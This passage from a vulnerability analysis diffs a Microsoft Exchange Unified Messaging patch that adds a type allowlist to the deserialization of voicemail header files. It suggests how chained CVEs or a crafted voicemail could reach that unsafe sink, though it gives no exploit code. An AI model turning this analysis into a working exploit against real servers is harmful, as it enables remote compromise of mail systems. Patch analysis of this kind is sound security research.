\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 3342616108U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 != 2975106116U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 3342616108U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 3342616108U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"TenantGuid\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"TenantGuid\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SenderAddress\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SenderAddress\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tstring text5 = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 != 3581765001U)\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\tif (num2 == 4186841001U)\n +\t\t\t\t\t\t\t\tif (num2 != 4186841001U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (text4 == \"CultureInfo\")\n -\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tif (!(text4 == \"CultureInfo\"))\n +\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n +\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\telse if (text4 == \"MessageID\")\n +\t\t\t\t\t\t\telse if (!(text4 == \"MessageID\"))\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\ttext2 = array[1];\n -\t\t\t\t\t\t\t\tcontinue;\n 
+\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\ttext2 = array[1];\n +\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\tIL_409:\n \t\t\t\t\t\t\tsubmissionHelper.CustomHeaders[array[0]] = array[1];\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text);\n \t\t\t\tif (num2 <= 894870128U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 <= 360985808U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 356120169U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 360985808U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"Fax\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new FaxPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"IncomingCallLog\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new IncomingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (num2 != 438908515U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 466919760U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 894870128U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"CDR\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = CDRPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"CDRData\"]);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"MissedCall\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"OCSNotification\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = OCSPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"OCSNotificationData\"]);\n \t\t\t\t\t\ttext2 = pipelineContext.messageID;\n 
\t\t\t\t\t\texDateTime = pipelineContext.sentTime;\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 <= 1086454342U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 995233564U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 1086454342U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"XSOVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tpipelineContext = new XSOVoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"PartnerTranscriptionRequest\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new PartnerTranscriptionRequestPipelineContext(submissionHelper);\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 != 1356218075U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 2525024257U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 3974407582U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"SMTPVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num < PipelineWorkItem.ProcessedCountMax - 1)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new VoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"HealthCheck\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new HealthCheckPipelineContext(Path.GetFileNameWithoutExtension(headerFile));\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (text == \"OutgoingCallLog\")\n \t\t\t\t{\n \t\t\t\t\tpipelineContext = new OutgoingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\tgoto IL_694;\n \t\t\t\t}\n \t\t\t\tthrow new 
HeaderFileArgumentInvalidException(string.Format(CultureInfo.InvariantCulture, \"{0}: {1}\", \"MessageType\", text));\n -\t\t\t\tIL_62E:\n +\t\t\t\tIL_694:\n \t\t\t\tif (text2 == null)\n \t\t\t\t{\n \t\t\t\t\ttext2 = Guid.NewGuid().ToString();\n \t\t\t\t\texDateTime = ExDateTime.Now;\n \t\t\t\t}\n \t\t\t\tpipelineContext.HeaderFileName = headerFile;\n \t\t\t\tpipelineContext.processedCount = num;\n \t\t\t\tif (contactInfo != null)\n \t\t\t\t{\n \t\t\t\t\tIUMResolveCaller iumresolveCaller = pipelineContext as IUMResolveCaller;\n \t\t\t\t\tif (iumresolveCaller != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tiumresolveCaller.ContactInfo = contactInfo;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tpipelineContext.sentTime = exDateTime;\n \t\t\t\tpipelineContext.messageID = text2;\n \t\t\t\tpipelineContext.WriteHeaderFile(headerFile);\n \t\t\t\tresult = pipelineContext;\n \t\t\t}\n -\t\t\tcatch (IOException ex)\n +\t\t\tcatch (IOException ex2)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to parse the header file {0} because its not closed by thread creating the file. Error={1}\", new object[]\n \t\t\t\t{\n \t\t\t\t\theaderFile,\n -\t\t\t\t\tex\n +\t\t\t\t\tex2\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tresult = null;\n \t\t\t}\n -\t\t\tcatch (InvalidObjectGuidException ex2)\n +\t\t\tcatch (InvalidObjectGuidException ex3)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the recipient for this message. 
Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex2\n +\t\t\t\t\tex3\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (InvalidTenantGuidException ex3)\n +\t\t\tcatch (InvalidTenantGuidException ex4)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the tenant for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex3\n +\t\t\t\t\tex4\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (NonUniqueRecipientException ex4)\n +\t\t\tcatch (NonUniqueRecipientException ex5)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Multiple objects found for the recipient. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex4\n +\t\t\t\t\tex5\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n \t\t\treturn result;\n \t\t}\n \n \t\tinternal abstract void WriteCustomHeaderFields(StreamWriter headerStream);\n \n \t\tpublic abstract string GetMailboxServerId();\n \n \t\tpublic abstract string GetRecipientIdForThrottling();\n \n \t\tinternal virtual void SaveMessage()\n \t\t{\n \t\t\tthis.WriteHeaderFile(this.HeaderFileName);\n \t\t}\n \n \t\tprotected override void InternalDispose(bool disposing)\n \t\t{\n \t\t\tif (disposing)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext.Dispose() called\", Array.Empty<object>());\n \t\t\t}\n \t\t}\n \n \t\tprotected override DisposeTracker InternalGetDisposeTracker()\n \t\t{\n \t\t\treturn DisposeTracker.Get<PipelineContext>(this);\n \t\t}\n \n \t\tprotected virtual void 
SetMessageProperties()\n \t\t{\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null)\n \t\t\t{\n \t\t\t\tExAssert.RetailAssert(iumresolveCaller.ContactInfo != null, \"ResolveCallerStage should always set the ContactInfo.\");\n \t\t\t\tUMSubscriber umsubscriber = ((IUMCAMessage)this).CAMessageRecipient as UMSubscriber;\n \t\t\t\tUMDialPlan dialPlan = (umsubscriber != null) ? umsubscriber.DialPlan : null;\n \t\t\t\tMicrosoft.Exchange.UM.UMCommon.PhoneNumber pstnCallbackTelephoneNumber = this.CallerId.GetPstnCallbackTelephoneNumber(iumresolveCaller.ContactInfo, dialPlan);\n \t\t\t\tthis.messageToSubmit.From = iumresolveCaller.ContactInfo.CreateParticipant(pstnCallbackTelephoneNumber, this.CultureInfo);\n \t\t\t\tXsoUtil.SetVoiceMessageSenderProperties(this.messageToSubmit, iumresolveCaller.ContactInfo, dialPlan, this.CallerId);\n \t\t\t\tthis.messageToSubmit.InternetMessageId = BoomerangHelper.FormatInternetMessageId(this.MessageID, Utils.GetHostFqdn());\n \t\t\t\tthis.messageToSubmit[ItemSchema.SentTime] = this.SentTime;\n \t\t\t}\n \t\t\tthis.messageToSubmit.AutoResponseSuppress = AutoResponseSuppress.All;\n \t\t\tthis.messageToSubmit[MessageItemSchema.CallId] = this.helper.CallId;\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tthis.MessageToSubmit.Recipients.Add(new Participant(iumcamessage.CAMessageRecipient.ADRecipient));\n \t\t\t\tIADSystemConfigurationLookup iadsystemConfigurationLookup = ADSystemConfigurationLookupFactory.CreateFromOrganizationId(iumcamessage.CAMessageRecipient.ADRecipient.OrganizationId);\n \t\t\t\tthis.MessageToSubmit.Sender = new Participant(iadsystemConfigurationLookup.GetMicrosoftExchangeRecipient());\n \t\t\t}\n \t\t}\n \n \t\tprotected void WriteHeaderFile(string headerFileName)\n \t\t{\n \t\t\tusing (FileStream fileStream = File.Open(headerFileName, FileMode.Create, FileAccess.Write, FileShare.None))\n \t\t\t{\n 
\t\t\t\tusing (StreamWriter streamWriter = new StreamWriter(fileStream))\n \t\t\t\t{\n \t\t\t\t\tif (this.MessageType != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageType : \" + this.MessageType);\n \t\t\t\t\t}\n \t\t\t\t\tstreamWriter.WriteLine(\"ProcessedCount : \" + this.processedCount.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\tif (this.messageID != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageID : \" + this.messageID);\n \t\t\t\t\t}\n \t\t\t\t\tif (this.sentTime.Year != 1)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"SentTime : \" + this.sentTime.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\t}\n \t\t\t\t\tthis.WriteCommonHeaderFields(streamWriter);\n \t\t\t\t\tthis.WriteCustomHeaderFields(streamWriter);\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tprotected virtual void WriteCommonHeaderFields(StreamWriter headerStream)\n \t\t{\n \t\t\tif (!this.CallerId.IsEmpty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerId : \" + this.CallerId.ToDial);\n \t\t\t}\n \t\t\tif (this.helper.RecipientName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientName : \" + this.helper.RecipientName);\n \t\t\t}\n \t\t\tif (this.helper.RecipientObjectGuid != Guid.Empty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientObjectGuid : \" + this.helper.RecipientObjectGuid.ToString());\n \t\t\t}\n \t\t\tif (this.helper.CallerName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerNAme : \" + this.helper.CallerName);\n \t\t\t}\n \t\t\tif (!string.IsNullOrEmpty(this.helper.CallerIdDisplayName))\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerIdDisplayName : \" + this.helper.CallerIdDisplayName);\n \t\t\t}\n \t\t\tif (this.CallerAddress != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerAddress : \" + this.CallerAddress);\n \t\t\t}\n \t\t\tif (this.helper.CultureInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CultureInfo : \" + this.helper.CultureInfo);\n \t\t\t}\n \t\t\tif 
(this.helper.CallId != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallId : \" + this.helper.CallId);\n \t\t\t}\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null && iumresolveCaller.ContactInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"ContactInfo : \" + CommonUtil.Base64Serialize(iumresolveCaller.ContactInfo));\n \t\t\t}\n \t\t\theaderStream.WriteLine(\"TenantGuid : \" + this.helper.TenantGuid.ToString());\n \t\t}\n \n \t\tprotected UMRecipient CreateRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\treturn UMRecipient.Factory.FromADRecipient<UMRecipient>(this.CreateADRecipientFromObjectGuid(objectGuid, tenantGuid));\n \t\t}\n \n \t\tprotected ADRecipient CreateADRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\tif (objectGuid == Guid.Empty)\n \t\t\t{\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(\"ObjectGuid is empty\");\n \t\t\t}\n \t\t\tADRecipient adrecipient = ADRecipientLookupFactory.CreateFromTenantGuid(tenantGuid).LookupByObjectId(new ADObjectId(objectGuid));\n \t\t\tif (adrecipient == null)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Could not find recipient {0}\", new object[]\n \t\t\t\t{\n \t\t\t\t\tobjectGuid.ToString()\n \t\t\t\t});\n \t\t\t\tthrow new InvalidObjectGuidException(objectGuid.ToString());\n \t\t\t}\n \t\t\treturn adrecipient;\n \t\t}\n \n \t\tprotected UMDialPlan InitializeCallerIdAndTryGetDialPlan(UMRecipient recipient)\n \t\t{\n \t\t\tUMDialPlan umdialPlan = null;\n \t\t\tif (this.CallerId.UriType == UMUriType.E164 && recipient.ADRecipient.UMRecipientDialPlanId != null)\n \t\t\t{\n \t\t\t\tumdialPlan = ADSystemConfigurationLookupFactory.CreateFromADRecipient(recipient.ADRecipient).GetDialPlanFromId(recipient.ADRecipient.UMRecipientDialPlanId);\n \t\t\t\tif (umdialPlan != null && umdialPlan.CountryOrRegionCode != null)\n \t\t\t\t{\n \t\t\t\t\tthis.helper.CallerId = 
this.helper.CallerId.Clone(umdialPlan);\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn umdialPlan;\n \t\t}\n \n \t\tprotected string GetMailboxServerIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.ServerLegacyDN;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"af360a7e-e6d4-494a-ac69-6ae14896d16b\";\n \t\t}\n \n \t\tprotected string GetRecipientIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.DistinguishedName;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"455e5330-ce1f-48d1-b6b1-2e318d2ff2c4\";\n \t\t}\n \n \t\tprivate MessageItem messageToSubmit;\n \n \t\tprivate SubmissionHelper helper;\n \n \t\tprivate string messageType;\n \n \t\tprivate CultureInfo cultureInfo;\n \n \t\tprivate string headerFileName;\n \n \t\tprivate int processedCount;\n \n \t\tprivate string messageID;\n \n \t\tprivate ExDateTime sentTime;\n +\n +\t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n +\t\t{\n +\t\t\ttypeof(Version),\n +\t\t\ttypeof(Guid),\n +\t\t\ttypeof(PropTag),\n +\t\t\ttypeof(ContactInfo),\n +\t\t\ttypeof(ADContactInfo),\n +\t\t\ttypeof(FoundByType),\n +\t\t\ttypeof(ADUser),\n +\t\t\ttypeof(ADPropertyBag),\n +\t\t\ttypeof(ValidationError),\n +\t\t\ttypeof(ADPropertyDefinition),\n +\t\t\ttypeof(ADObjectId),\n +\t\t\ttypeof(ExchangeObjectVersion),\n +\t\t\ttypeof(ExchangeBuild),\n +\t\t\ttypeof(MultiValuedProperty<string>),\n +\t\t\ttypeof(LocalizedString),\n +\t\t\ttypeof(ProxyAddressCollection),\n +\t\t\ttypeof(SmtpAddress),\n 
+\t\t\ttypeof(RecipientDisplayType),\n +\t\t\ttypeof(RecipientTypeDetails),\n +\t\t\ttypeof(ElcMailboxFlags),\n +\t\t\ttypeof(UserAccountControlFlags),\n +\t\t\ttypeof(ObjectState),\n +\t\t\ttypeof(DirectoryBackendType),\n +\t\t\ttypeof(MServPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinitionFlags),\n +\t\t\ttypeof(OrganizationId),\n +\t\t\ttypeof(PartitionId),\n +\t\t\ttypeof(SmtpProxyAddress),\n +\t\t\ttypeof(SmtpProxyAddressPrefix),\n +\t\t\ttypeof(ByteQuantifiedSize),\n +\t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n +\t\t\ttypeof(List<ValidationError>),\n +\t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n +\t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n +\t\t\ttypeof(StoreObjectId),\n +\t\t\ttypeof(StoreObjectType),\n +\t\t\ttypeof(EntryIdProvider),\n +\t\t\ttypeof(SimpleContactInfoBase),\n +\t\t\ttypeof(MultipleResolvedContactInfo),\n +\t\t\ttypeof(CallerNameDisplayContactInfo),\n +\t\t\ttypeof(PersonalContactInfo),\n +\t\t\ttypeof(DefaultContactInfo),\n +\t\t\ttypeof(UMDialPlan),\n +\t\t\ttypeof(UMEnabledFlags),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n +\t\t\ttypeof(DialByNamePrimaryEnum),\n +\t\t\ttypeof(DialByNameSecondaryEnum),\n +\t\t\ttypeof(AudioCodecEnum),\n +\t\t\ttypeof(UMUriType),\n +\t\t\ttypeof(UMSubscriberType),\n +\t\t\ttypeof(UMGlobalCallRoutingScheme),\n +\t\t\ttypeof(UMVoIPSecurityType),\n +\t\t\ttypeof(SystemFlagsEnum),\n +\t\t\ttypeof(EumProxyAddress),\n 
+\t\t\ttypeof(EumProxyAddressPrefix)\n +\t\t};\n \t}\n }\n \n\nThe patch appears to add and use a typed allowlist for deserialization of a voicemail\u2019s contact info, which is found in a header file alongside the voicemail itself. ~~Other seemingly unprotected deserializations can be seen in the same class.~~ (I think it\u2019s just XML parsing.) My suspicion is that [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) or [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) could be used to write a malicious header file to `C:\\Program Files\\Microsoft\\Exchange Server\\V15\\UnifiedMessaging\\voicemail`, but it\u2019s entirely possible a crafted voicemail could be sent instead. While I haven\u2019t developed a PoC yet, I do have a good idea how to, assuming the patch analysis is correct. Better-resourced attackers should be able to exploit this issue in considerably less time.\n\nThe specifically patched code can be seen below:\n \n \n [snip]\n \t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tException ex = null;\n \t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\ttry\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n \t\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcatch (Exception 
ex)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tfinally\n \t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n \t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n \t\t\t\t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n \t\t\t\t\t\t\t\t\t\t\t\t\tex\n \t\t\t\t\t\t\t\t\t\t\t\t});\n \t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n [snip]\n \n \n \n [snip]\n \t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n \t\t{\n \t\t\ttypeof(Version),\n \t\t\ttypeof(Guid),\n \t\t\ttypeof(PropTag),\n \t\t\ttypeof(ContactInfo),\n \t\t\ttypeof(ADContactInfo),\n \t\t\ttypeof(FoundByType),\n \t\t\ttypeof(ADUser),\n \t\t\ttypeof(ADPropertyBag),\n \t\t\ttypeof(ValidationError),\n \t\t\ttypeof(ADPropertyDefinition),\n \t\t\ttypeof(ADObjectId),\n \t\t\ttypeof(ExchangeObjectVersion),\n \t\t\ttypeof(ExchangeBuild),\n \t\t\ttypeof(MultiValuedProperty<string>),\n \t\t\ttypeof(LocalizedString),\n \t\t\ttypeof(ProxyAddressCollection),\n \t\t\ttypeof(SmtpAddress),\n \t\t\ttypeof(RecipientDisplayType),\n \t\t\ttypeof(RecipientTypeDetails),\n \t\t\ttypeof(ElcMailboxFlags),\n \t\t\ttypeof(UserAccountControlFlags),\n \t\t\ttypeof(ObjectState),\n \t\t\ttypeof(DirectoryBackendType),\n \t\t\ttypeof(MServPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinition),\n \t\t\ttypeof(MbxPropertyDefinitionFlags),\n \t\t\ttypeof(OrganizationId),\n \t\t\ttypeof(PartitionId),\n \t\t\ttypeof(SmtpProxyAddress),\n \t\t\ttypeof(SmtpProxyAddressPrefix),\n \t\t\ttypeof(ByteQuantifiedSize),\n \t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n 